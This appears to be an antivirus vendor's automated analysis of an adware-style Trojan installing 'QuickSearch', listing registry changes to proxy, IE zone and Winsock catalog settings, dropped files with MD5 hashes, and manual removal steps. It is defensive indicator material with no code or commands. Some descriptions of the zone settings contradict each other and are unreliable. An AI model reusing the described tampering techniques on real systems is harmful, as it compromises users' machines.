[HKCR\CLSID\{89E46EA6-2F87-4D79-8FFA-8B264F93F54A}\TypeLib]
"(Default)" = "{029AF757-A988-4BDD-A744-A4C7BCEBB011}"
[HKCR\TypeLib\{029AF757-A988-4BDD-A744-A4C7BCEBB011}\1.0\0\win32]
"(Default)" = "%Program Files%\QuickSearch\zcengine.tlb"
[HKCR\Interface\{389562C4-59D9-40C4-966E-28DA91725FFE}\TypeLib]
"(Default)" = "{029AF757-A988-4BDD-A744-A4C7BCEBB011}"
[HKCR\zcengineLib.DataController\CLSID]
"(Default)" = "{89E46EA6-2F87-4D79-8FFA-8B264F93F54A}"
[HKCR\Interface\{3F8D3B31-AEB8-4ED7-8B05-5556068D6B54}\TypeLib]
"Version" = "1.0"
[HKCR\Interface\{F2FB003D-07C7-4E4D-80E3-00B49468A6F4}\TypeLib]
"(Default)" = "{029AF757-A988-4BDD-A744-A4C7BCEBB011}"
[HKCR\zcengineLib.DataTable]
"(Default)" = "DataTable Class"
[HKCR\zcengineLib.DataTableHolder.1]
"(Default)" = "DataTableHolder Class"
[HKCR\Interface\{83E07061-02D1-41EC-8751-BB176B823C38}]
"(Default)" = "IDataController"
[HKCR\CLSID\{6D5AF218-5F7E-40E0-B49D-54FFAFE2001A}]
"AppID" = "{9F2949D6-977B-4B61-B513-0C2EE52C2B4F}"
[HKCR\CLSID\{F1BC674D-15D8-46C5-AC51-12AB16D67616}]
"(Default)" = "ReadOnlyManager Class"
[HKCR\zcengineLib.DataController.1]
"(Default)" = "DataController Class"
[HKCR\CLSID\{F1BC674D-15D8-46C5-AC51-12AB16D67616}\TypeLib]
"(Default)" = "{029AF757-A988-4BDD-A744-A4C7BCEBB011}"
[HKCR\Interface\{83E07061-02D1-41EC-8751-BB176B823C38}\TypeLib]
"Version" = "1.0"
[HKCR\CLSID\{34EBA76A-E745-4B18-96C9-2B8E2BA8B246}\TypeLib]
"(Default)" = "{029AF757-A988-4BDD-A744-A4C7BCEBB011}"
[HKCR\Interface\{9F0948E7-227A-4F1B-9849-2D8912F185A7}]
"(Default)" = "ILSPLogic"
[HKCR\Interface\{A471A4AA-5C18-429F-81BF-6C760941DB74}]
"(Default)" = "IDataTableHolder"
[HKCR\zcengineLib.WFPController\CurVer]
"(Default)" = "zcengineLib.WFPController.1"
[HKCR\CLSID\{F811C371-1DC7-4E2F-8676-D96B85BE4AF1}\VersionIndependentProgID]
"(Default)" = "zcengineLib.DataTable"
[HKCR\CLSID\{F1BC674D-15D8-46C5-AC51-12AB16D67616}\VersionIndependentProgID]
"(Default)" = "zcengineLib.ReadOnlyManager"
[HKCR\CLSID\{6D5AF218-5F7E-40E0-B49D-54FFAFE2001A}\VersionIndependentProgID]
"(Default)" = "zcengineLib.DataTableFields"
The Trojan deletes the following value(s) in system registry:
[HKCR\AppID\{9F2949D6-977B-4B61-B513-0C2EE52C2B4F}]
"KomodiaParameters1"
[HKLM\System\CurrentControlSet\Services\zcengine]
"NoCom"
[HKCR\AppID\{9F2949D6-977B-4B61-B513-0C2EE52C2B4F}]
"LocalService"
The process sc.exe:536 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "87 04 82 B7 92 63 72 C6 41 24 8E 6A 3F 4B A8 75"
The process sc.exe:1632 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CA 45 47 BC DE 32 84 8E FB 3F 1E E5 FC 79 BE B6"
The process poz.exe:2584 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0A 7E C3 76 49 73 55 48 04 75 5A D8 1A 20 8B 77"
The process SchTasks.exe:2660 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F2 E9 A0 99 A4 C8 B0 66 DE A3 AB C4 68 A9 81 FF"
The process %original file name%.exe:944 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1A 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "93 5E B5 93 5A 0B 89 BE 37 1D 3E 1E 66 D4 90 B2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE security-zone settings so that all network paths (UNCs) are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security-zone settings so that all sites that bypass the proxy server are mapped to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security-zone settings so that all local (intranet) sites not listed in other zones are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
These three ZoneMap values are the default "Local intranet" zone options and are typically written when WinINet/urlmon first initialises Internet Explorer settings for a user profile, so on their own they are weak evidence of deliberate zone tampering.
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process setupfs_1123.exe:1940 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\QuickSearch\Components]
"Main" = "1"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsw6.tmp\nsProcess.dll,"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\QuickSearch]
"ver" = "3.0.1.6"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\QuickSearch]
"Path" = "%Program Files%\QuickSearch"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\QuickSearch]
"affid" = "1123"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "94 14 18 EC A8 35 42 F0 AA AD 94 1B D9 C0 05 77"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\QuickSearch]
"UID" = "75ED9567AA584C8EA8EA3CAD7C47AB03"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE security zone settings so that all local web nodes whose names contain no dots and are not assigned to any other zone are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan modifies IE security zone settings to map all URLs to the Intranet Zone:
"IntranetName" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process zengine.exe:2036 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F9 31 90 BE D7 17 48 A3 88 C4 CD 54 6A C5 49 D4"
The process zengine.exe:1968 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DA B4 90 46 CB 76 80 2E D4 D2 4C 4A D6 96 05 14"
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000011]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000009]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000015]
"PackedCatalogItem" = "43 3A 5C 57 49 4E 44 4F 57 53 5C 73 79 73 74 65"
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9]
"Num_Catalog_Entries" = "14"
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000007]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000002]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9]
"Serial_Access_Num" = "12"
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000006]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000005]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000013]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000014]
"PackedCatalogItem" = "43 3A 5C 57 49 4E 44 4F 57 53 5C 73 79 73 74 65"
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000004]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000003]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000016]
"PackedCatalogItem" = "43 3A 5C 57 49 4E 44 4F 57 53 5C 73 79 73 74 65"
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000008]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9]
"Next_Catalog_Entry_ID" = "1021"
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000010]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000001]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000012]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
The Trojan deletes the following registry key(s):
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000012]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000014]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\0000000C]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\0000000B]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\0000000E]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000010]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\0000000D]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000001]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000013]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000003]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000002]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000005]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000004]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000007]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000006]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000009]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000008]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000016]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000015]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000011]
Dropped PE files
MD5 | File path |
---|---|
05450face243b3a7472407b999b03a72 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsw6.tmp\nsProcess.dll |
227edfeeac94d640320bab9ba86c0196 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\01M9AVQ1\setupfs_4435[1].exe |
f4ce39b055fd011a17f71d09baef2ef8 | c:\Program Files\QuickSearch\AZDLL.dll |
cff77090b485bb16093678614b578820 | c:\Program Files\QuickSearch\AZDLL64.dll |
f32ab5cb40ff403b0576ffc9cae61caf | c:\Program Files\QuickSearch\AZDLL64.exe |
87ec6937769621f29736e4358077c8cd | c:\Program Files\QuickSearch\freebl3.dll |
74485152d7f2c06fe413f48c7da4ff33 | c:\Program Files\QuickSearch\libnspr4.dll |
08bacf2967fd8ea468c69f6e8d31b914 | c:\Program Files\QuickSearch\libplc4.dll |
56c1c79274ef5728b1f50986a5a8f22e | c:\Program Files\QuickSearch\libplds4.dll |
9721a913f9a997a62c532d72ed3e7b8d | c:\Program Files\QuickSearch\nss3.dll |
ba406d87af2f892c1b59628899fbcb10 | c:\Program Files\QuickSearch\nssckbi.dll |
56c619b8135d1fbe8386800020fe7696 | c:\Program Files\QuickSearch\nssdbm3.dll |
08b59a1793e8cd6fb085271650f8b5d0 | c:\Program Files\QuickSearch\nssutil3.dll |
8d03b10f0dced524a88a3ff4b370f50d | c:\Program Files\QuickSearch\slite.exe |
88f553be556ae62c59b3a3fbea81987e | c:\Program Files\QuickSearch\smime3.dll |
5ecb1c6033d08a9277df748f6272d6a2 | c:\Program Files\QuickSearch\softokn3.dll |
6cba9fe251b78db6ae8c46f851244141 | c:\Program Files\QuickSearch\spw3016.exe |
18a54a743d683a0dc40c65155d108608 | c:\Program Files\QuickSearch\sqlite3.dll |
bf203215a99a7b24f0481003e91ffa65 | c:\Program Files\QuickSearch\ssl3.dll |
8de2f3879c867dbfde7780d5b849c223 | c:\Program Files\QuickSearch\uninstall.exe |
1894e3fb9c90fa3a238076f28839eadd | c:\Program Files\QuickSearch\zcengine.dll |
7bf0de4c88daf2dbbb99d26cba6e0042 | c:\Program Files\QuickSearch\zcengine.exe |
f539a593f3a793b659f84236b7ac14c7 | c:\Program Files\QuickSearch\zcengine64.dll |
f10d05a6264e55443a96b311f2da003d | c:\Program Files\QuickSearch\zcenginecert.dll |
a187767d9b561e9864ebd0faec8e1eac | c:\Program Files\QuickSearch\zcinstaller.exe |
04dfc579947f4b98944d0c117bed393f | c:\Program Files\QuickSearch\zcwfp.sys |
69dc57b6a37a50328c8980cc5021d7dc | c:\Program Files\QuickSearch\zcwfp64.sys |
39adb8287d5ca0ae1059b9665624af43 | c:\Program Files\QuickSearch\zengine.exe |
dd45f06354ebd07fda123cf0c880e91e | c:\Program Files\QuickSearch\zengine64.exe |
1894e3fb9c90fa3a238076f28839eadd | c:\WINDOWS\system32\zcengine.dll |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate the malicious process(es) with the Task Manager:
zcengine.exe:1284
zcengine.exe:1208
zcengine.exe:684
sc.exe:536
sc.exe:1632
poz.exe:2584
SchTasks.exe:2660
%original file name%.exe:944
setupfs_1123.exe:1940
zengine.exe:2036
zengine.exe:1968
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\zcengine.log (434 bytes)
%WinDir%\Temp\zcengine.log (83902 bytes)
%WinDir%\Temp\CertsIE.dat (12284 bytes)
%System%\zcengineOff.ini (784 bytes)
%System%\zcengine.ini (872 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\I9SFMNGD\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
C:\setupfs_1123.exe (332214 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\01M9AVQ1\setupfs_4435[1].exe (332214 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\nsExec.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\8JMRO554\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\UAC.dll (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\01M9AVQ1\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SVMBSZ6F\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\ns3.tmp (6 bytes)
%Program Files%\QuickSearch\zcinstaller.exe (5896 bytes)
%Program Files%\QuickSearch\uninstall.exe (1793 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\nsE.tmp (6 bytes)
%Program Files%\QuickSearch\AZDLL64.exe (3704 bytes)
%Program Files%\QuickSearch\zcengine.dll (9984 bytes)
%Program Files%\QuickSearch\zcwfp64.sys (1552 bytes)
%Program Files%\QuickSearch\spw3016.exe (1856 bytes)
%Program Files%\QuickSearch\slite.exe (16288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\GetVersion.dll (6 bytes)
%Program Files%\QuickSearch\nssutil3.dll (5064 bytes)
%Program Files%\QuickSearch\ssl3.dll (8184 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\ns7.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\ns8.tmp (6 bytes)
%Program Files%\QuickSearch\out.txt (52 bytes)
%Program Files%\QuickSearch\libnspr4.dll (11048 bytes)
C:\END (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\nsC.tmp (6 bytes)
%Program Files%\QuickSearch\libplds4.dll (1552 bytes)
%Program Files%\QuickSearch\softokn3.dll (8560 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\inetc.dll (784 bytes)
%Program Files%\QuickSearch\poz.exe (4080 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\pwgen.dll (784 bytes)
%Program Files%\QuickSearch\zcengine64.dll (11728 bytes)
%Program Files%\QuickSearch\zengine64.exe (9664 bytes)
%Program Files%\QuickSearch\zcwfp.sys (1552 bytes)
%Program Files%\QuickSearch\zengine.ini (116 bytes)
%Program Files%\QuickSearch\nssckbi.dll (14184 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\nsD.tmp (6 bytes)
%Program Files%\QuickSearch\zcengine.tlb (1856 bytes)
%Program Files%\QuickSearch\zengine.exe (17395 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\nsExec.dll (6 bytes)
%Program Files%\QuickSearch\freebl3.dll (11152 bytes)
%Program Files%\QuickSearch\smime3.dll (5064 bytes)
%Program Files%\QuickSearch\AZDLL64.dll (5184 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp (235157 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\nsProcess.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\nsA.tmp (6 bytes)
%Program Files%\QuickSearch\libplc4.dll (1552 bytes)
%Program Files%\QuickSearch\zcenginecert.dll (6056 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\I9SFMNGD\ext[1].htm (2 bytes)
%Program Files%\QuickSearch\sqlite3.dll (15536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\ns9.tmp (6 bytes)
%Program Files%\QuickSearch\nss3.dll (29256 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\nsB.tmp (6 bytes)
%Program Files%\QuickSearch\zcengine.exe (72529 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\System.dll (11 bytes)
%Program Files%\QuickSearch\nssdbm3.dll (6360 bytes)
%Program Files%\QuickSearch\AZDLL.dll (3744 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\lengine.ini.log (895 bytes)
%System%\zcengine.dll (1281 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files.
Static Analysis
VersionInfo
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 23628 | 24064 | 4.46394 | 856b32eb77dfd6fb67f21d6543272da5 |
.rdata | 28672 | 4764 | 5120 | 3.4982 | dc77f8a1e6985a4361c55642680ddb4f |
.data | 36864 | 154712 | 1024 | 3.3278 | 7922d4ce117d7d5b3ac2cffe4b0b5e4f |
.ndata | 192512 | 40960 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rsrc | 233472 | 2528 | 2560 | 3.12457 | af5f0ea142ea650416afc03d4547aebc |
Dropped from:
3117f416905582f23f49d25c1be8c5a6
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 23
8c788790039d11a28836711e355ba31e
5b0d5015e3c9a03e64c30c14d6708e1a
c437f1ccca1a26838185203812fc7e40
17fac347497d4b7fdd2d1e5a7ed819d1
00e1fb6179a9f410ee536197ea6d226f
b5d995c48e9978cdd729b465ad2fb685
3246158dce46d9aac1908157cf6da56f
ca7e3b01164d376114b1f6a73915a743
4fe0909222050513238c67bd5fe51e93
